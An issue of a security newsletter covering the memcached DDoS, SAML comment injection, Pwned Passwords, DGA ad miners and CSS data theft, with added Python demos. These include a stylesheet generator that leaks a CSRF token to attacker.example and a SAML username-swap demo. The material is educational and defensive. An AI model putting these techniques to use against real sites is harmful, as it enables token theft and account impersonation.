Issue 66

 

New record DDoS attack through memcached-based amplification

The target was GitHub, which mitigated the 1.3 Tbps attack with the help of Akamai.
Memcached-based amplification attacks aren't a new idea, but the technique has now been picked up and weaponised. Memcached answers UDP requests with no handshake, so an attacker spoofs the victim's address as the source and the server sends its much larger reply to the victim. Reported amplification factors are around 50,000x, and one observed 203-byte request drew a 100 megabyte response, which works out to nearly 500,000x. If you run memcached, make sure it is not reachable over UDP port 11211 from the internet: bind it to localhost, firewall the port, or start it with -U 0 to turn UDP off (memcached 1.5.6 and later disable UDP by default).
wired.com
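To make the amplification concrete, here is an added example (not from the article or from the memcached project) that builds the 8-byte memcached UDP frame around a "stats" command, parses the reply framing, computes the amplification ratio, and offers a probe you can point at your own servers to confirm UDP is closed. The host, port and timeout are assumptions; the probe sends a single request and is only meant for hosts you are responsible for.

```python
import socket
import struct

# memcached UDP frame header (8 bytes, four big-endian 16-bit fields):
# request ID, sequence number, total datagrams in this message, reserved (0).
UDP_HEADER = struct.Struct("!HHHH")


def build_udp_request(command, request_id=1):
    """Wrap a text-protocol command (e.g. b"stats") in a single-datagram UDP frame."""
    return UDP_HEADER.pack(request_id, 0, 1, 0) + command + b"\r\n"


def parse_udp_response(datagram):
    """Split a response datagram into (request_id, seq, total, payload)."""
    if len(datagram) < UDP_HEADER.size:
        raise ValueError("datagram shorter than the memcached UDP header")
    request_id, seq, total, _reserved = UDP_HEADER.unpack_from(datagram)
    return request_id, seq, total, datagram[UDP_HEADER.size:]


def amplification_factor(request_bytes, response_bytes):
    """Bytes the reflector sends to the victim per byte the attacker spent."""
    return response_bytes / request_bytes


def probe_udp(host, port=11211, timeout=2.0):
    """Send one 'stats' request and return (request_len, response_len), or None
    when nothing answers within the timeout. Any reply means UDP is exposed.
    Use only against hosts you are responsible for."""
    request = build_udp_request(b"stats")
    received, seen, total = 0, set(), 1
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(request, (host, port))
        try:
            # Large replies are split over several datagrams; collect them all.
            while len(seen) < total:
                data, _ = sock.recvfrom(65535)
                _, seq, total, _ = parse_udp_response(data)
                seen.add(seq)
                received += len(data)
        except socket.timeout:
            pass
    return (len(request), received) if received else None


if __name__ == "__main__":
    result = probe_udp("127.0.0.1")
    if result is None:
        print("no UDP reply on 127.0.0.1:11211 (good)")
    else:
        req, resp = result
        print(f"UDP open: {req} bytes in, {resp} bytes out, "
              f"x{amplification_factor(req, resp):.0f}")
```

A reply to a 15-byte "stats" frame is already a few kilobytes; the attack traffic used larger pre-populated values, which is where the six-figure ratios come from.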

 

23,000 users lose SSL certificates in Trustico-DigiCert fight

From what I can make out: Trustico, an SSL reseller, wanted to mass-revoke 50,000 of its certificates, which had been issued through Symantec. DigiCert, which bought Symantec's SSL business, said it could only do that if the certificates were compromised. Trustico then e-mailed DigiCert the private keys of 23,000 certificates, keys a reseller should never have held in the first place, which made those certificates compromised by definition and obliged DigiCert to revoke them. The practical lesson: generate your own key pair and hand your CA or reseller only the CSR; if anyone else has ever held your private key, treat the certificate as compromised. More details in the article.
bleepingcomputer.com

 

SAML vulnerability through inconsistent comment handling

Researchers at Duo found that several SAML implementations handle XML comments inconsistently: the canonicalisation step strips comments before the signature is verified, but the code that later reads the NameID stops at the first text node. Inserting a comment into a signed assertion, for example turning user@example.com.evil.example into user@example.com<!---->.evil.example, therefore changes the username the service provider reads without invalidating the signature. Anyone with an account on the same identity provider could use this to authenticate as someone else.
sophos.com
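The following added example (mine, not Duo's proof of concept or any library's code) reproduces the inconsistency with Python's standard library: canonicalising the original and the comment-carrying NameID without comments yields identical bytes, so a signature over the canonical form still verifies, while a parser that reads only the first text node sees a different user. The NameID values and the .evil.example domain are constructed for illustration. It also shows the two fixes: concatenate all text nodes, or refuse assertions that contain comments at all.

```python
import xml.etree.ElementTree as ET
from xml.dom import minidom
from xml.dom.minidom import Node

# Constructed fragments standing in for the NameID of a signed assertion.
# ORIGINAL is what the identity provider issued for the attacker's own account;
# TAMPERED is the same element with an empty comment inserted afterwards.
ORIGINAL = "<NameID>user@example.com.evil.example</NameID>"
TAMPERED = "<NameID>user@example.com<!---->.evil.example</NameID>"


def canonical_form(xml_text):
    """Canonical XML with comments dropped, which is what the signature covers.
    (ElementTree implements C14N 2.0; exclusive C14N 1.0, the usual choice in
    SAML, likewise omits comments by default.)"""
    return ET.canonicalize(xml_text, with_comments=False)


def naive_name_id(xml_text):
    """The vulnerable pattern: read only the first text node of the element."""
    elem = minidom.parseString(xml_text).documentElement
    return elem.firstChild.data


def robust_name_id(xml_text):
    """Fix 1: concatenate every text node so a comment cannot split the value."""
    elem = minidom.parseString(xml_text).documentElement
    return "".join(n.data for n in elem.childNodes if n.nodeType == Node.TEXT_NODE)


def contains_comment(xml_text):
    """Fix 2 (stricter): refuse any assertion that carries comment nodes."""
    stack = [minidom.parseString(xml_text)]
    while stack:
        node = stack.pop()
        if node.nodeType == Node.COMMENT_NODE:
            return True
        stack.extend(node.childNodes)
    return False


if __name__ == "__main__":
    print("signature input identical:",
          canonical_form(ORIGINAL) == canonical_form(TAMPERED))
    print("naive parser sees: ", naive_name_id(TAMPERED))
    print("robust parser sees:", robust_name_id(TAMPERED))
    print("tampered has comment:", contains_comment(TAMPERED))
```

The root cause is that signature verification and value extraction operate on two different views of the same document; whichever fix you choose, make sure the value you authorise is taken from the exact byte sequence that was verified.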

 

Troy Hunt launches v2 of "Pwned Passwords"

The service lets you tell your users that the password they chose has already appeared in a breach, and so will probably be in any attacker's dictionary. The post explains in detail how privacy is preserved (the client sends only the first five hex characters of the password's SHA-1 hash and matches the remainder locally against the few hundred hashes returned for that range, so the service never sees the password or its full hash) and how the service is built.
troyhunt.com
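As an added example (my code, not Troy Hunt's client or server implementation), here is the range lookup end to end: hash the password, send only the 5-character prefix, and match the 35-character suffix against the returned list. The endpoint URL is the real v2 API; the SAMPLE_RANGE_5BAA6 body is a constructed stand-in for the server's reply, with made-up counts and neighbouring suffixes, so the check runs offline.

```python
import hashlib
import urllib.request

RANGE_URL = "https://api.pwnedpasswords.com/range/"  # the real v2 endpoint


def split_sha1(password):
    """SHA-1 of the password, split into the 5-hex-char prefix that is sent
    to the API and the 35-char suffix that never leaves the client."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def parse_range(text):
    """Turn the API's 'SUFFIX:COUNT' lines into {suffix: count}."""
    counts = {}
    for line in text.splitlines():
        suffix, sep, count = line.strip().partition(":")
        if sep:
            counts[suffix.upper()] = int(count)
    return counts


def breach_count(password, fetch_range):
    """Times the password was seen in breaches (0 = not found).
    fetch_range(prefix) must return the body of GET /range/<prefix>."""
    prefix, suffix = split_sha1(password)
    return parse_range(fetch_range(prefix)).get(suffix, 0)


def fetch_range_live(prefix):
    """Real lookup: the server learns only the prefix, i.e. one of 16^5 buckets."""
    with urllib.request.urlopen(RANGE_URL + prefix, timeout=10) as resp:
        return resp.read().decode("utf-8")


# Constructed stand-in for the API body for prefix 5BAA6 (the prefix of
# SHA-1("password")). The other suffixes and all counts are made up.
SAMPLE_RANGE_5BAA6 = """\
00D4F6E8A1B2C3D4E5F60718293A4B5C6D7:1
1E4C9B93F3F0682250B6CF8331B7EE68FD8:3000000
8A2F1C3E5D7B9A0C2E4F6A8B0D1C3E5F7A9:17
"""


def fetch_range_offline(prefix):
    """Offline substitute for fetch_range_live, used for the demo below."""
    return SAMPLE_RANGE_5BAA6 if prefix == "5BAA6" else ""


if __name__ == "__main__":
    for pw in ("password", "correct horse battery staple 7Qx!"):
        print(repr(pw), "->", breach_count(pw, fetch_range_offline))
```

Swap fetch_range_offline for fetch_range_live to query the real service; nothing else changes, which is the point of keeping the hashing and matching on the client.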

 

Using ever-changing domain names to bypass ad blockers and deploy in-browser miners

Researchers have described a malicious ad network that evades ad blockers by continuously generating new domain names on which the ads and miners are hosted, so that blocklists can never keep up. The technique, a domain generation algorithm (DGA), is usually seen in malware command-and-control rather than in advertising.
bleepingcomputer.com
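To show why a static blocklist cannot keep up, here is an added illustrative DGA (my construction, not the algorithm the article describes): the serving side and the in-page script both derive the day's hostnames from a shared secret and the date, so neither needs to contact the other to agree on them. The secret, label length and TLD list are assumptions. The last function shows the defender's counter-move: once the algorithm and seed are recovered, future domains can be computed and blocked or sinkholed ahead of time.

```python
import datetime
import hashlib

SECRET = "shared-secret-placeholder"  # assumed; known to both sides of the ad network
TLDS = ("com", "net", "info")         # assumed


def daily_domains(secret, day, count=20):
    """Deterministic hostname list for one calendar day (day is an ISO date string)."""
    datetime.date.fromisoformat(day)  # reject malformed dates early
    domains = []
    for i in range(count):
        material = f"{secret}|{day}|{i}".encode("utf-8")
        label = hashlib.sha256(material).hexdigest()[:12]  # hex chars: always a valid label
        domains.append(f"{label}.{TLDS[i % len(TLDS)]}")
    return domains


def blocked_fraction(blocklist, domains):
    """Share of a day's domains that a given blocklist would catch."""
    return sum(d in blocklist for d in domains) / len(domains)


def sinkhole_candidates(secret, start_day, days_ahead):
    """Defender side: with the algorithm and seed known, precompute the next
    days' domains so they can be blocked (or registered) before first use."""
    start = datetime.date.fromisoformat(start_day)
    out = []
    for n in range(days_ahead):
        day = (start + datetime.timedelta(days=n)).isoformat()
        out.extend(daily_domains(secret, day))
    return out


if __name__ == "__main__":
    yesterday = set(daily_domains(SECRET, "2018-03-01"))
    today = daily_domains(SECRET, "2018-03-02")
    print("caught by yesterday's blocklist:", blocked_fraction(yesterday, today))
    print("caught by precomputed list:    ",
          blocked_fraction(set(sinkhole_candidates(SECRET, "2018-03-01", 3)), today))
```

Real DGAs vary in seed source (date, trending topics, exchange rates) and in how many domains they try per day, but the defensive logic is the same: recover the algorithm from the script or binary, then compute ahead.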

 

‘In Fraud We Trust’ – Cybercrime arrests show we’re fighting pros

The article details the inner workings of Infraud, a well-organised marketplace for stolen identities and the like, comparable to Silk Road. Thirty-six people have been indicted, of whom only 13 have been arrested so far.
sophos.com

 

CSS can be abused to collect sensitive user data

Though not a new technique in itself, data exfiltration through CSS selectors has attracted fresh attention lately. Attribute selectors such as input[value^="a"] match only when the attribute starts with the given string, and a matching rule can load a background image from an attacker's server, so a page into which CSS can be injected leaks attribute values (a CSRF token, say) one character at a time. This article goes through the findings.
bleepingcomputer.com
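The following added example (my own simulation, not code from the article) generates the attacker's stylesheet for a hidden CSRF field and models the browser's matching so the leak can be followed offline: for each position, one rule per candidate character, and only the rule whose starts-with prefix matches causes a request, whose URL reveals the next character. The attacker endpoint, field name and character set are assumptions; a real attack needs a fresh stylesheet per position (or @import tricks) and a value that lives in an attribute, not in text content.

```python
import string

ATTACKER = "https://attacker.example/leak/"  # assumed collection endpoint
CHARSET = string.ascii_lowercase + string.digits  # assumed token alphabet


def exfil_stylesheet(known, selector='input[name="csrf"]', attr="value"):
    """One rule per candidate next character. A browser only fetches the
    background image of a rule whose ^= (starts-with) test matches, so the
    requested URL tells the attacker which character came next."""
    rules = []
    for c in CHARSET:
        guess = known + c
        rules.append(f'{selector}[{attr}^="{guess}"] '
                     f'{{ background-image: url({ATTACKER}{guess}); }}')
    return "\n".join(rules)


def browser_requests(stylesheet, secret):
    """Simulate the browser: URLs fetched for a field whose attribute equals
    `secret`, mirroring the CSS ^= semantics."""
    fetched = []
    for rule in stylesheet.splitlines():
        start = rule.index('^="') + 3
        guess = rule[start:rule.index('"', start)]
        if secret.startswith(guess):
            url_start = rule.index("url(") + 4
            fetched.append(rule[url_start:rule.index(")", url_start)])
    return fetched


def recover_secret(secret, length):
    """Attacker side: inject one stylesheet per position and extend the prefix
    with whatever character the leaked request reveals."""
    known = ""
    for _ in range(length):
        hits = browser_requests(exfil_stylesheet(known), secret)
        if len(hits) != 1:
            break  # no candidate matched (character outside CHARSET) or ambiguity
        known = hits[0][len(ATTACKER):]
    return known


if __name__ == "__main__":
    print(exfil_stylesheet("").splitlines()[0])
    print("recovered:", recover_secret("a1b2c3", 6))
```

A Content Security Policy that restricts style-src and img-src to your own origins blocks both the injection and the outbound request, which is why the technique mostly bites on pages without CSP.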

 

How to find cryptojacking malware

Interesting blog post by a researcher on how to find instances of cryptojacking. Coinhive alone appears to be present on over 34,000 sites, with various similar services taking a much smaller share.
badpackets.net

 

Curated list of awesome threat intelligence resources

Amazing list of threat intelligence resources: IP blacklists and whitelists, firewall rules, threat sharing formats and threat-related reading material.
github.com

 

Sponsorship

 

Bypassing web application firewalls

WAFs are a good security measure, but the security of your web applications should not depend solely on them. Watch this demo on Paul’s Security Weekly, in which a researcher from Netsparker explains and demonstrates how modern web application firewalls can be bypassed.
netsparker.com

 

Securing your company Macs

Fleetsmith is a fantastic solution for keeping your macOS devices managed and secure, used by yours truly every day. It fully integrates with G Suite, and you can try it free with 10 devices for as long as you need.
fleetsmith.com